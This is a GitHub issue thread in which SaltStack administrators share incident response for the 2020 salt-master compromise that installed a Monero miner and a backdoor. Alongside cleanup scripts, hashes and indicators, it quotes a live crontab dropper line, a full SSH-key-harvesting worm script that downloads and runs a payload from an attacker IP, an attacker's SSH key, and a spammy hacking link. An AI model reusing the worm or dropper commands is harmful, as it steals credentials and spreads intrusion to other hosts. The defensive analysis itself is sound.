Very quick and dirty howto to wrap salt traffic in spiped for encryption:
https://gist.github.com/darkpixel/51930435c27724d2b41daa8c6bded673
I'm going to work on a few salt states to automatically push these changes out to my minions and I will publish those as well.
@taigrr I would like to be added to slack as well. Thanks! user: int-adam
A small hint for those with "recurring" malware issues. If you have installed saltstack from your distribution repositories the master may still be vulnerable. Right now there are no fixed versions in any ubuntu and debian official repositories. EPEL (there is no saltstack in CentOS directly) was last updated in 2016.
Personally, I'd just shutoff the salt-master, wait for a fixed version and put it back online afterwards. If this is a feasible solution.
@adamf-int don't see you. Found everybody else so far. Did you use the heroku signup link?
@adamf-int don't see you. Found everybody else so far. Did you use the heroku signup link?
When I click the link, it says not found.
@adamf-int don't see you. Found everybody else so far. Did you use the heroku signup link?
When I click the link, it says not found.
Updated link. Try again.
@adamf-int don't see you. Found everybody else so far. Did you use the heroku signup link?
When I click the link, it says not found.
I couln´t access this link either. What´s the correct Slackware´s signup link?
@adamf-int don't see you. Found everybody else so far. Did you use the heroku signup link?
When I click the link, it says not found.
Updated link. Try again.
OK the link worked this time.
Hi there. This one got me too. When I try to access https://saltstackcommunity.herokuapp.com/invite it says 'Not Found'. Would really appreciate some help recovering from this issue...
Everyone, I updated my message. Remove "invite" from the end of the link.
After entering your email. you may have to wait a moment to be accepted by the channel admins (I am not an admin).
New channel is #salt-store-miner-public . No need to DM me for permission anymore!
Cheers!
Found just now in crontab :
wget -q -O - http://54.36.185.99/c.sh | sh > /dev/null 2>&1
Don't forget to check your crontab !
cd /var/spool/cron/crontabs/ && grep . *
Note! The dropper appears to have been updated:
hxxp://89.223.121.139/sa.sh
salt-store malware has been modified, the new MD5 hash is:
2c5cbc18d1796fd64f377c43175e79a3
Which is downloaded from:
hxxps://bitbucket.org/samk12dd/git/raw/master/salt_storer
hxxp://413628.selcdn.ru/cdn/salt-storer
Multiple people at this point have reported this user/repository to Atlassian's Bitbucket. I wish their support would react!
Multiple people at this point have reported this user/repository to Atlassian's Bitbucket. I wish their support would react!
They took it down hours ago, actually.
I cannot stress how important it is, that if you're reading this thread now, you fix it NOW! The malware is improving in real-time. Join the slack channel (links above) for help removing it before it's too late!
Note: once you join, read this thread. It has nearly all the information I've gathered on the situation, and I am continuously updating it:
https://saltstackcommunity.slack.com/archives/C01354HKHMJ/p1588535319018000
If your system runs AppArmor, create two empty profiles, so it won't be able even to execute norally:
salt "*" cmd.run "echo 'profile salt-store /var/tmp/salt-store { }' | tee /etc/apparmor.d/salt-store"
salt "*" cmd.run "apparmor_parser -r -W /etc/apparmor.d/salt-store"
salt "*" cmd.run "echo 'profile salt-minions /tmp/salt-minions { }' | tee /etc/apparmor.d/salt-minions"
salt "*" cmd.run "apparmor_parser -r -W /etc/apparmor.d/salt-minions"
@Talkless Thanks. The script does disable apparmor though, using a shell script run by salt-minion, so I don't think that will help unless you've already patched your salt-master and restarted it. And if you've done that, you'll also need to re-enable apparmor and delete the binaries anyway. Probably still worth doing!
unless you've already patched your salt-master and restarted it.
Well of course.
The awesome part is, the official SaltStack docker repos don't have the fix pushed yet:
https://hub.docker.com/r/saltstack/salt/tags
Diff against /etc
backup against current /etc
shows these two new files:
Only in /etc/: ld.so.cache
Only in /etc/selinux: config
what's the patch version for this fix?
what's the patch version for this fix?
There are official packages for 2019.2.x (2019.2.4) and 3000.x (3000.2).
There are also patches available for versions all the way back to 2015.8.10 found here:
https://www.saltstack.com/lp/request-patch-april-2020/
Note: once you join, read this thread. It has nearly all the information I've gathered on the situation, and I am continuously updating it:
https://saltstackcommunity.slack.com/archives/C01354HKHMJ/p1588535319018000
Could we have public gist or smth?
I have written this script to clean up most of the damage known to me:
https://gist.github.com/itskenny0/df20bdb24a2f49b318a91195634ed3c6
Please note that this might not be complete and that, as Mike in Slack put it, the absence of known fingerprints at this point does not mean that affected hosts are secure.
minions
kill -9 $(pgrep salt-minions) kill -9 $(pgrep salt-store) rm -f /tmp/salt-minions rm -f /var/tmp/salt-store sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf systemctl restart firewalld || /etc/init.d/iptables restart
master
yum update salt-master systemctl restart salt-master
This is working. @aTastyCookie Thank you very much.
I'm also wondering if cleared these back-doors as well as upgraded/patched the master node, is there anything extra we should do?
I'm also wondering if cleared these back-doors as well as upgraded/patched the master node, is there anything extra we should do?
It's worth being very clear about this -- if you had a Salt process running as root, an attacker effectively had root-level access to the system(s) in question. In this thread, there have been descriptions of known attacks but there may also be attacks circulating which do not match the same fingerprints as those so far described.
I emphasize that there is not currently evidence of this at present but at a minimum, anyone affected by this exploit should consider information disclosure, remote back-doors, ransomware and other attack vectors as being _possible_ though, as mentioned -- none of these have yet been seen or reported.
Critical Vulnerability in Salt Requires Immediate Patching
https://www.securityweek.com/critical-vulnerability-salt-requires-immediate-patching
You can test if your salt master needs to be patched like so:
curl -X POST -F 'ip=your.saltmaster.ip.address' https://saltexploit.com/test
If it does, it will create /tmp/HACKED.txt
on your master (it will leave your minions alone and doesn't have any other side effects), if not, it won't.
😂 Letting a random site know the IP of your publicly exposed salt-master is a very very bad idea. Don't do that. If you have a public salt master, firewall it off the internet immediately.
If you want to verify whether you need to patch, do it offline with the check script from here: https://github.com/rossengeorgiev/salt-security-backports
Oh yeah I agree completely @rossengeorgiev . Don't trust me at all. Very bad idea. Don't do it. But it works xD
In all seriousness though, I am tying my reputation to not abusing that service, though. So yeah. I'm sure some in the slack channel can attest to that. Take that as you will. I promise I'm not keeping any IP addresses. Pinky swear? I did have 2 strangers in the slack channel audit me, but I can't offer any proof of that either, so...
Site has been updated to point to the offline checker and recommend that over the web one.
@here for anyone who is cleaning up their environment and is worried about potentially compromised salt pub/priv key pairs: https://github.com/dwoz/salt-rekey
We're putting together some information that should be released later today for those that need some help/don't already have a dedicated team.
In case it's not already obvious by this point:
When we get our post live we'll drop it here - in the interim, everyone has been amazing in the #salt-store-miner-public channel on the community Slack :black_heart: :black_heart: :black_heart: :black_heart:
Thanks @waynew. I'm continuing to update my gist and saltexploit.com with all the information I have.
FYI: We had one host sacrficed as honeypot. To see any progress. Seems to be update for the hack.
/tmp/salt-minions
is now keeping up by scripts in /tmp/.ICEd-unix
don't be fooled /tmp/.ICE-unix
is valid directory.
There is also script which at the first glance try to dig more into infrastructure by your own keys
#!/bin/sh
localgo() {
myhostip=$(curl -sL icanhazip.com)
KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
USERZ=$(
echo "root"
find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq
)
USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
pl=$(
echo "22"
cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}'
)
sshports=$(echo "$pl" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
i=0
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
for sshp in $sshports; do
i=$((i+1))
if [ "${i}" -eq "20" ]; then
sleep 20
ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
i=0
fi
#Wait 20 seconds after every 20 attempts and clean up hanging processes
chmod +r $key
chmod 400 $key
echo "$user@$host $key $sshp"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http://176.31.60.91/s2.sh|sh; sudo wget -q -O - http://176.31.60.91/s2.sh|sh;"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "curl -L http://176.31.60.91/s2.sh|sh; wget -q -O - http://176.31.60.91/s2.sh|sh;"
done
done
done
done
}
localgo
Hope it helps some one.
After further looking through one of my affected machines, a dropper scriptfile was found. The script tries to find any SSH private keys and copy itself to any SSH hosts it finds in user's history / ssh configs.
Both, the initial script, as well as the downloaded infection script, can be found in an impromptu repo I made: https://github.com/Aldenar/salt-malware-sources/tree/master
DO NOT run any of the scripts. They are live, and will infect your system!
@Aldenar this is a serious development. Where was this file placed?
It also adds a key to /root/.ssh/authorized_keys:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDouxlPJjZxuIhntTaY5MixCXoPdUXwM3IsGd2005bIgazuNL4Y5fxANuahqLia7w28hm9FoBYqkjNQ9JHFEyP0g3gFp94nZzw+mQSJPSeTPKBX0U9B1G4Pi/sTNVDknJjjiQ3sOmJ0AN8JLPC/5ID05h/vMISZ9N/dp36eLV1Z0xSUBC/bddglU3MtdWKI8QLQefQpi5v9tZ2bgBUPA+unsnRA6tn30S/3XS+E9kaE4oMz9P0Yg5aLYc7XMoDVdUSfP8u4LpG1ByLrqAB3cRrU0AndV++e+uBu61boQ5vACHhcqq66b+Vk+9JmvdlT+n+PbNwmJNcFwSLF12fFBoF/
@Foobartender or @frenkye can you tell me what the full path of dropper is?
Hi guys, same issue here, with version 4 of the malware, see https://saltexploit.com/ and compare md5sum of /tmp/salt-minions.
Cleaned up with:
# Script taken from
# https://gist.github.com/itskenny0/df20bdb24a2f49b318a91195634ed3c6#file-cleanup-sh
# Crontab entries deleted, check only
sudo crontab -l | grep 'http://'
# sudo crontab -l | sed '/54.36.185.99/d' | sudo crontab -
# sudo crontab -l | sed '/217.8.117.137/d' | sudo crontab -
#
# Delete and kill malicious processes
sudo kill -9 $(pgrep salt-minions)
sudo kill -9 $(pgrep salt-store)
sudo rm -f /tmp/salt-minions
sudo rm -f /var/tmp/salt-store
sudo kill -9 $(pgrep -f ICEd)
sudo rm -rf /tmp/.ICE*
sudo rm -rf /var/tmp/.ICE*
sudo rm /root/.wget-hsts
# create apparmor profiles to prevent execution
echo 'profile salt-store /var/tmp/salt-store { }' | sudo tee /etc/apparmor.d/salt-store
sudo apparmor_parser -r -W /etc/apparmor.d/salt-store
echo 'profile salt-minions /tmp/salt-minions { }' | sudo tee /etc/apparmor.d/salt-minions
sudo apparmor_parser -r -W /etc/apparmor.d/salt-minions
# reenable nmi watchdog
sudo sysctl kernel.nmi_watchdog=1
sudo echo '1' >/proc/sys/kernel/nmi_watchdog
sudo sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf
# disable hugepages
sudo sysctl -w vm.nr_hugepages=0
# enable apparmor
sudo systemctl enable apparmor
sudo systemctl start apparmor
# fix syslog
sudo touch /var/log/syslog
sudo systemctl restart rsyslog
I have uploaded this script on a different web server and then run script similar to this example:
#!/bin/bash
ADDRESS=( 1.2.3.4
5.6.7.8
9.10.11.12
)
function my-ssh() {
ssh -i ~/.ssh/ec2.pem -l ubuntu $*
}
for server in ${ADDRESS[*]}
do
echo $server
my-ssh $server 'wget -q -O - https://myserver/kill_salt.sh | bash -x -v'
done
I found another script fetched from hxxp://176.104.3.35/?<id>
:
1234.txt
@Foobartender is this file, exactly as you fetched it?
@taigrr It was in /tmp/.ICEd-unix/
The script had a completely random name. No suffix to indicate file type.
There are also patches available for versions all the way back to 2015.8.10 found here:
https://www.saltstack.com/lp/request-patch-april-2020/
Putting patches behind some sort of sign-up wall requesting personal information isn't exactly classy. Just seems like a way to further annoy users after a major security issue.
@jblac No, I added two obvious lines on top for safety.
I analysed the malware a little, nothing spectacular. The salt-minions binary really seems to be just a Monero miner.
Here is the dropper script from the Cron job: hxxps://pastebin.com/UDykbnpU
A few DNS requests were made to pool.minexmr.com.
Here is a stack and heap dump of /tmp/salt-minions running in a sandboxed VM with the XMR wallet IDs and IP sockets: hxxps://pastebin.com/wue5zivp
And finally here a list of all Go source files: hxxps://pastebin.com/FMu6HfsK
The other one's much nastier.
Make sure to clean ALL crontabs in /var/spool/cron, not just the one of the root user.
I analysed the malware a little, nothing spectacular. The salt-minions binary really seems to be just a Monero miner.
Here is the dropper script from the Cron job: hxxps://pastebin.com/UDykbnpU
A few DNS requests were made to pool.minexmr.com.
Here is a stack and heap dump of /tmp/salt-minions running in a sandboxed VM with the XMR wallet IDs and IP sockets: hxxps://pastebin.com/wue5zivp
And finally here a list of all Go source files: hxxps://pastebin.com/FMu6HfsKThe other one's much nastier.
Make sure to clean ALL crontabs in /var/spool/cron, not just the one of the root user.
What would be "the other ones"?
Newer versions if you didn't get to it in time.
One's, not ones. I meant the salt-store remote shell. I dumped its memory as well, but nothing interesting popped up, since it doesn't have many hardcoded strings and is probably obfuscated. I could find a sorted array of ASCII characters. I did not perform any more detailed analysis of the disassembly, so the information is of limited value, but I posted it anyway just in case.
@taigrr - please add me to the Slack channel. Thank you for setting it up.
@sdreher
It's public, see saltexploit.com
https://github.com/saltstack/salt/issues/57088
For the people still need to use SaltStack, but now temporarily lack confidence.
There is original sa.sh
script: https://file.io/h0dXR3W9 downloaded on our salt instance.
So, i've found some additional files that appear to be dropped.
On the salt-master:
/usr/local/lib/liblmvi.so (sha256:2984033766ce913cdf9b7ee92440e7e962b5cb5b90f7d1034f69837f724990ee)
It seems that virustotal doesn't detect it as bad.
It adds this path to /etc/ld.so.preload
On both salt-minions and master i've also found that some of the dropped files can't be deleted due to immutable attribute set.
This string helped, script helped to locate them:
lsattr -aR .//. 2>/dev/null | sed -rn '/i.+\.\/\/\./s/\.\/\///p'
In addition, i've also found /etc/hosts to be edited with additional entries for Bitbucket.
In case somebody would need this. I used this commands to do quick fix on affected systems:
```killall -9 salt-minions;
killall -9 salt-store;
rm -f /tmp/salt;
rm -f /var/tmp/salt;
rm /usr/bin/salt-store;
kill -9 $(pgrep -f ICEd);
rm -rf /tmp/.ICE;
rm -rf /var/tmp/.ICE;
rm /root/.wget-hsts;
sed -i '/bitbucket.org$/d' /etc/hosts;
rm /usr/local/lib/.so; # as far as I know there should not be any legitimate .so but check it before running
rm /etc/ld.so.preload;
ldconfig;
sed -i '/kernel.nmi_watchdog=0$/d' /etc/sysctl.conf;
rm /etc/selinux/config; #if you do not use custom selinux config
touch /var/log/syslog;
service rsyslog restart;
rm /etc/salt/minion.d/_schedule.conf;
systemctl stop salt-minion;
rm /etc/salt/pki/minion/; #need to regenerate salt keys
rm /var/tmp/rf /var/tmp/temp3754r97y12
I never seem this mentioned before, but I found this file trying to periodicaly run salt:
rm /etc/salt/minion.d/_schedule.conf;
```
Also check /etc/cron.d
for strange files usually with random 4-5 letter name.
@MartinMystikJonas : please don't try to salvage systems at this point. Start fresh.
/etc/salt/minion.d/_schedule.conf
: this file is fine. Please read the documentation if you're confused on what it is.
Everyone else: that helper script may be enough to help you calm down your CPU cycles enough to pull out data from your boxes (make the Cryptominer calm down for a bit) but please remember all your ssh keys and secrets were probably stolen, and you have no way to know what's lingering.
If you have any other questions, please visit saltexploit.com or visit the slack channel (directions also on saltexploit.com)
Hi @wavded,
Can you please share the logs path location as what you mention below? Appreciate it. Thanks.
Regards,
SC
In our experience, we had one job that was executed that did the following on each server according to the logs:
<83>¦returnÚláFirewall stopped and disabled on system startup kernel.nmi_watchdog = 0 userdel: user 'akay' does not exist userdel: user 'vfinder' does not exist chattr: No such file or directory while trying to stat /root/.ssh/authorized_keys grep: Trailing backslash grep: write error: Broken pipe log_rot: no process found chattr: No such file or directory while trying to stat /etc/ld.so.preload rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory rm: cannot remove '/var/tmp/lib': No such file or directory rm: cannot remove '/var/tmp/.lib': No such file or directory chattr: No such file or directory while trying to stat /tmp/lok chmod: cannot access '/tmp/lok': No such file or directory sh: 484: docker: not found sh: 485: docker: not found sh: 486: docker: not found sh: 487: docker: not found sh: 488: docker: not found sh: 489: docker: not found sh: 490: docker: not found sh: 491: docker: not found sh: 492: docker: not found sh: 493: docker: not found sh: 494: docker: not found sh: 495: docker: not found sh: 496: docker: not found sh: 497: docker: not found sh: 498: docker: not found sh: 499: docker: not found sh: 500: docker: not found sh: 501: docker: not found sh: 502: docker: not found sh: 503: docker: not found sh: 504: docker: not found sh: 505: docker: not found sh: 506: setenforce: not found apparmor.service is not a native service, redirecting to systemd-sysv-install Executing /lib/systemd/systemd-sysv-install disable apparmor insserv: warning: current start runlevel(s) (empty) of script `apparmor' overrides LSB defaults (S). insserv: warning: current stop runlevel(s) (S) of script `apparmor' overrides LSB defaults (empty). Failed to stop aliyun.service.service: Unit aliyun.service.service not loaded. Failed to execute operation: No such file or directory P NOT EXISTS md5sum: /var/tmp/salt-store: No such file or directory salt-store wrong --2020-05-02 20:10:27-- https://bitbucket.org/samk12dd/git/raw/master/salt-store Resolving bitbucket.org (bitbucket.org)... 18.205.93.1, 18.205.93.2, 18.205.93.0, ... Connecting to bitbucket.org (bitbucket.org)|18.205.93.1|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 16687104 (16M) [application/octet-stream] Saving to: '/var/tmp/salt-store' 2020-05-02 20:10:40 (1.27 MB/s) - '/var/tmp/salt-store' saved [16687104/16687104] 8ec3385e20d6d9a88bc95831783beaeb salt-store OK§retcode^@§successÃ
@suhaimi-cyber4n6 it's on the salt-master. Look in the cachedir
for saltstack. (Usually /var/cache/salt/master/jobs
) Note that by default, salt only stores your jobs for 24 hours, so it may be too late to see your output by now.
Thank you very much @taigrr . I really appreciate it. :)
@suhaimi-cyber4n6 it's on the salt-master. Look in the
cachedir
for saltstack. (Usually/var/cache/salt/master/jobs
) Note that by default, salt only stores your jobs for 24 hours, so it may be too late to see your output by now.
Sorry for being late to this game. Here is what I've seen on Linux. Your experience may differ. (I've proofread this a couple of times. I believe I've corrected my typos.)
I've seen two different processes, salt-minions (Not the "s" at the end) and salt-store.
Check for these files in /tmp /var/tmp /usr/bin
(/usr/bin/salt-minions
can hide among the VALID /usr/bin/salt-minion
files!)
Check your crontabs for two entries, likely the last two lines. These commands run every minute to pull down what I think is the installer and to restart salt-store.
* * * * * wget -q -O - http://<ip address>/<shortname>.sh | sh > /dev/null 2>&1
* * * * * /usr/bin/salt-store || /tmp/salt-store || /var/tmp/salt-store
Verify these are NOT YOURS, then remove or comment out as you would with any normal cron job.
If you are using systemd, run systemctl status salt-minion
and examine the CGroup section. You will see your "systemctl" command in there. This is normal. You may see something like this running in tmp. The first number is the process ID (PID) number. I've omitted PIDs here.
sh -c /tmp/.ICEd-unix/<five random characters>
/tmp/.ICEd-unix/<same five random characters>
Note the d at the end of .ICEd
in the malicious directory name. Be aware that /tmp/.ICE-unix
is a valid directory name, please don't mess with that one as I believe it handles X11 sessions!
This command will also list your valid /usr/bin/python /usr/bin/salt-minion
sessions. You will likely see the malicious salt-minions
(Note the trailing S in minionS!) process.
For the experienced Unix/Linux administrators/users out there, this find command will quickly locate and print the extended attributes of the file listed after "-name". If you're not comfortable using find, skip it and look for the files manuall.
find /tmp /var/tmp /usr/bin -type f -name salt-store -exec lsattr \{\} \; -print
If you're comfortable with find, you can change lsattr
to chattr -i
to remove the immutable flag. You can change the file name to look for something other than salt-store
Found /usr/bin/salt-store on one server, MD5: 33140982ace71281c40d0dab0e9d69b8
https://www.virustotal.com/gui/file/98d3fd460e56eff5182d5abe2f1cd7f042ea24105d0e25ea5ec78fedc25bac7c/community
Probably it appear late with updates, because i found it only on one server.
Also mentioned (published) even on January 2020 ... - CVE-2019-17361
(https://access.redhat.com/security/cve/cve-2019-17361)
@pretorianec-ua That is a different issue than the one being discussed in this thread.
closing as there likely isn't any new relevant information to be added, here and if there is please see our Community Slack Channel #salt-store-miner-public
Does status - mile stone approved means we are working on a fix but not yet released? And do we have a fix branch to follow?
@myloveecho This wasn't actually a bug in saltstack, but rather a report of evidence gathered regarding an exploit that used another bug, which was fixed several releases ago. There are patches available here.
You can also just upgrade to Sodium, which has the fixes already included.
This is actually easy, you can check https://www.netweakhackers.com to learn more.
Most helpful comment
sudo salt -v '*' cmd.run 'ps aux | grep -e "/var/tmp/salt-store\|salt-minions" | grep -v grep | tr -s " " | cut -d " " -f 2 | xargs kill -9'
This did at least something for me